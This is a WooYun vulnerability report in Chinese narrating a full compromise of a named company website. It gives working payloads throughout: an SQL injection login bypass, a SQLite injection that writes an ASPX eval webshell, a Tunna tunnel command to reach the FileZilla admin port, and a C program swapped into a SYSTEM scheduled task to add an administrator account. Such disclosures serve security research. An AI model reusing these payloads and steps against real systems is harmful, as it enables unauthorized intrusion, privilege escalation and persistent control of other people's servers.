WooYun.org

http://www.xl-group.com.cn/manage/login.aspx

存在注入
账号admin' or '1'='1，密码随便直接能登录，不过登录后没什么用，只能上传图片，也不存在上传漏洞，换思路，这都能注入，其他地方也能，又找到一个地方

http://www.xl-group.com.cn/search.aspx?keywords='

这一定在逗我，源代码有了，路径有了 SQLite数据库，想办法上个一句话，经过试验，只有upload目录有写权限，构造个payload

http://www.xl-group.com.cn/search.aspx?keywords=1%';ATTACH DATABASE 'e:\\tianxia246\\xl-group.com.cn\\upload\\tcb.aspx' AS pwns;CREATE TABLE pwns.exp(dataz text);INSERT INTO pwns.exp(dataz) VALUES('<%@ Page Language="Jscript"%><%eval(Request.Item["www"],"unsafe");%>');--

然后菜刀连接http://www.xl-group.com.cn/upload/tcb.aspx，连上

继续测试，只有读权限，只有upload目录和c:\windows\system32\inetsrv有写权限，虚拟终端只能在c:\windows\system32\inetsrv执行，权限是iis权限，很低，开了21端口
在D盘找到了ftp软件，FileZilla Server，把FileZilla Server Interface.xml脱下来就看到明文的ftp管理密码，想办法连接14147就可以管理ftp，不过14147只能本地访问，原本想用fpipe，端口映射了却连不上，后面一想应该是开了防火墙，还是用网页中转靠谱，用tunna，传一个conn.aspx来中转，本地运行
python proxy.py -u http://www.xl-group.com.cn/Controls/conn.aspx -l 1234 -r 14147 –v
然后用FileZilla Server Interface连接本地127.0.0.1:1234，就可以管理ftp了，加几个账号目录为c: d: e:，这样就可以全服务器上传下载文件了
先进c盘，看用户目录的我的文档，发现5301为远程桌面的端口，连接远程桌面发现禁用了粘滞键和辅助功能，继续换思路，看计划任务，发现有一个

一个以system权限运行的flash更新的计划任务，每小时运行一次，那好办，用ftp替换c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe为我们的程序，我写了一个小程序

#include <stdlib.h>
int main()
{
	system("net user 用户名******* 密码********** /add");
	system("net localgroup administrators 用户名******* /add");
}

然后等计划任务到时间，果然账号建好了